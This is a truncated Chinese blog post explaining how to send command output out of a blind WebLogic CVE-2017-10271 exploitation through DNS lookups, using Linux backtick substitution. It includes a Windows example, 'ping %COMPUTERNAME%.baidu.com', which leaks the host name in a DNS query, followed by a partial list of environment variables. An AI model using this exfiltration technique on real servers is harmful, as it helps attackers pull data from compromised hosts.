利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果

本文讲述了如何利用DNSlog回显技术处理Weblogic(CVE-2017-10271)漏洞,当目标系统不回显命令结果时,通过Linux的反引号执行命令并结合Windows下的变量大全,将结果编码避免空格问题。最后,提到了在遇到命令中有空格的情况时,通过base64编码和替换空格为-的方法来解决。
摘要由CSDN通过智能技术生成

作者:Armyzer0

 

Weblogic(CVE-2017-10271) 漏洞出来以后又是一波血雨腥风,正好我昨天测试的时候发现了一个存在这个漏洞的weblogic,但是他不回显咋办呢!让他返回执行结果集到dnslong首先大家先了解下 “ 这个符号在Linux的作用!

符号:` `
名称:反引号,上分隔符
位置:反引号(`)这个字符一般在键盘的左上角,数字1的左边,不要将其同单引号(’)混淆
作用:反引号括起来的字符串被shell解释为命令行,在执行时,shell首先执行该命令行,并以它的标准输出结果取代整个反引号(包括两个反引号)部分

1.png

` ` 里面的内容是当做命令来执行

还有一些其他符号也可以产生同样的效果我就不一一介绍了

然后我们在来说下Windows 下的

2.png

ping %COMPUTERNAME%.baidu.com  [/size][/align]
[align=left][size=3]%COMPUTERNAME% 是一个变量,得到计算机名[/size][/align]
[align=left][size=3]%ALLUSERSPROFILE% : 列出所有用户Profile文件位置。 
%APPDATA% :  列出应用程序数据的默认存放位置。 
%CD% :  列出当前目录。 
%CLIENTNAME% :  列出联接到终端服务会话时客户端的NETBIOS名。 
%CMDCMDLINE% :  列出启动当前cmd.exe所使用的命令行。 
%CMDEXTVERSION% :  命令出当前命令处理程序扩展版本号。 
%CommonProgramFiles% :  列出了常用文件的文件夹路径。 
%COMPUTERNAME% :  列出了计算机名。  
%COMSPEC% :  列出了可执行命令外壳(命令处理程序)的路径。 
%DATE% :  列出当前日期。 
%
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值